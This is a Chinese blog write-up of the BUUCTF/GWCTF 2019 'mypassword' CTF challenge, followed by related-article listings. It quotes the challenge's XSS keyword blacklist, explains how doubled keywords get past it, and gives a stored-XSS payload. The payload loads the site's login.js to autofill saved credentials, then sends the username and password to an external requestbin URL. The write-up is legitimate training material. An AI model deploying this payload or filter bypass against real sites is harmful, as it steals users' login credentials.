BUUCTF__[GWCTF 2019]mypassword_题解

最新推荐文章于 2023-09-05 09:30:41 发布
最新推荐文章于 2023-09-05 09:30:41 发布
阅读量876 收藏 1
点赞数 1
分类专栏: BUU做题记录 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/116276324
版权

题解

  • 开局像极了注入,但却是个XSS。
  • 第一步信息收集,没有找到直接的提示或者后端源码。但是注册登录上去在feedback.php 有一个输入反馈,并且在页面存在注释。
			if(is_array($feedback)){
				echo "<script>alert('反馈不合法');</script>";
				return false;
			}
			$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
			foreach ($blacklist as $val) {
		        while(true){
		            if(stripos($feedback,$val) !== false){
		                $feedback = str_ireplace($val,"",$feedback);
		            }else{
		                break;
		            }
		        }
		    }
  • 简单的关键字置换为空,注意 str_ireplace函数,该函数单次匹配递归匹配,但它关键字是一个数组,遍历数组,每次一个关键字,那么就能通过简单的双写关键字绕过,但是不能为同一个关键字。比如简单的<scriphostt>alert(1)</scriphostt>,点击List列表中编号就能弹窗。由被过滤的关键字都是XSS常用的来反推可能是个XSS题目。
  • 第二点,利用XSS来干啥?
  • 容易忽略一个地方,在登录页面中的/js/login.js
if (document.cookie && document.cookie != '') {
	var cookies = document.cookie.split('; ');
	var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
		var arr = cookies[i].split('=');
		var key = arr[0];
		cookie[key] = arr[1];
	}
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
		document.getElementsByName("username")[0].value = cookie['user'];
		document.getElementsByName("password")[0].value = cookie['psw'];
	}
}
  • 代码会把cookie中的username和password填进当前表单
  • 如果我们写一个页面,页面中有表单,再调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求带出。就能得到管理员cookie。
  • poc,提交反馈
<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
	var uname = documcookieent.getElemcookieentsByName("username")[0].value;
	var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
	var res = uname + " " + passwd;
	documcookieent.locacookietion="http://http.requestbin.buuoj.cn/*/?a="+res;
</scricookiept>
  • 先访问http://http.requestbin.buuoj.cn/点击 Create a RequestBin获取一个链接,将poc中的http://http.requestbin.buuoj.cn/*/ 中的*改为自己的标识符就行。过一会刷新。
    在这里插入图片描述
风过江南乱
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
App.rar_csharp 配置文件
09-22
Password=myPassword;" /> ``` 开发者可以根据实际环境修改这些值,使应用程序能够连接到正确的数据库实例。 在压缩包内的`DevComponents.DotNetBar2.dll`文件,这是一个DLL动态链接库,可能属于DevExpress工具包...
BUUCTF——password1
最新发布
hand2some2的博客
09-21 484
老样子,这道密码类型题我们直接看题目:刚看到题目我是这样的:这是啥?咋解密,然后仔细敲了敲最后一行,尝试将这三个信息关联起来:发现如果将张三变为 zs加上它的日期长度刚好符合题目的xx长度,那我们不妨试下:
[GWCTF 2019]mypassword
shinygod的博客
09-18 476
知识点:xss
BUUCTF password 1
YueXuan_521的博客
06-07 411
BUUCTF password 1
BUUCTF-Crypto部分题解-1
一个学习网安的鸡翅
05-16 2297
今天刚刚学了点密码学的知识,于是开始浅浅刷一下Crypto的题库吧。 不太温馨的小提示: 做这类题目的时候,最好要准备好工具。俗话说的好,工欲善其事必先利其器。一款好用的工具能极大地提高效率。这里推荐使用CaptfEncoder工具,然后资源的话,你是在c站啊,你搜索一下,有一大堆大佬已经发出来了,这里就不赘述了。 1.MD5: MD5 1 注意:得到的 flag 请包上 flag{} 提交 这题没什么好说的,直接找MD5破解网站就行了。提交 的时候记得注意一下提交格式哦! 知...
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 671
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
ODBC.rar_c# odbc
09-14
Password=myPassword;"; OdbcConnection connection = new OdbcConnection(connectionString); ``` 连接成功后,我们可以打开连接: ```csharp connection.Open(); ``` 执行SQL查询或命令通常通过`OdbcCommand`...
Connection_Parameters.zip
02-12
user=myuser&password=mypassword"; ``` 在"Connection_Parameters"文件中,可能包含了不同的数据库连接配置示例,用于不同的环境(开发、测试、生产),或者是针对不同数据库系统的配置。理解并正确配置这些参数...
ado_access.rar_mysql ado
09-24
Password=myPassword;" ``` 而针对MySQL,我们可以使用MySQL ODBC驱动,连接字符串会变成: ```cpp connectionString = "Driver={MySQL ODBC 5.1 Driver};Server=myServerAddress;Database=myDataBase;User=...
lianjieshujuku.rar_c 用ADO连接
09-24
Password=myPassword;”。 3. **打开和关闭连接**:使用Connection对象的Open()方法建立连接,Close()方法关闭连接。确保在完成数据操作后正确关闭连接,以释放系统资源。 4. **执行SQL命令**:通过Command对象的...
buuctf crypto [password]解题记录
jsbbd12的博客
09-05 297
buuctf 密码学刷题记录
buuctf-password
小星星的博客
04-06 2125
打开题目: 看得我一脸懵逼,谁能想到密码是名字第一个字母缩写+生日?? 即 zs19900315
密码学-->buuctf 1~12
qq2489021103的博客
04-10 1507
buuctf密码学 1.MD5 题目附件打开是一个MD5直接在线解密即可 flag{admin1} 2.url编码 打开是一个url编码,直接解密即可 flag{and 1=1} 3.一眼就解密 看起来像base64,试一下果然是 flag{THE_FLAG_OF_THIS_STRING} 4.看我回旋踢 回旋,想到凯撒密码,因为凯撒密码以26为一个循环 flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1} 5.摩斯 摩斯解码 flag{ILOVEYOU} 6.passwor
[BUUCTF][GWCTF 2019]mypassword
Y4tacker的博客
10-17 2764
首先从登陆界面看到了提示 发现了一串js代码,这段话是什么意思很easy了 if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++) { var arr = cookies[i].split('='); var key = arr[0
buu刷题(第一周)
qq_62046696的博客
03-01 785
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
【网络安全 | CTF】BUUCTF Brute 1解题详析(BurpSuite爆破实战)
等风来
04-28 5456
4、Cluster bomb:每个变量对应一个字典,并且交集破解尝试每一个组合,每个用户和每个密码进行匹配,两个字典。找到返回长度异于其它payload的请求(在此实例中即为admin),响应页面回显。2、Battering ran:对变量进行同时破解,用户名和密码相同,仅一个字典。由上可知,发送到第6491个请求时才爆破出密码为6491,而这个过程是十分慢的。3、pitch fork:每个变量对应一个字典,用户名和密码一一对应,两个字典。单独抓包时回显仅用户名错误,考虑先爆破用户名。
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 406
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
在哪里配置ansible_ssh_pass
03-26
web1.example.com ansible_ssh_pass=MyPassword123 ``` 这样,当Ansible连接到web1.example.com时,它将使用密码MyPassword123进行身份验证。 需要注意的是,这样明文存储密码是不安全的,建议使用其他安全方式,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值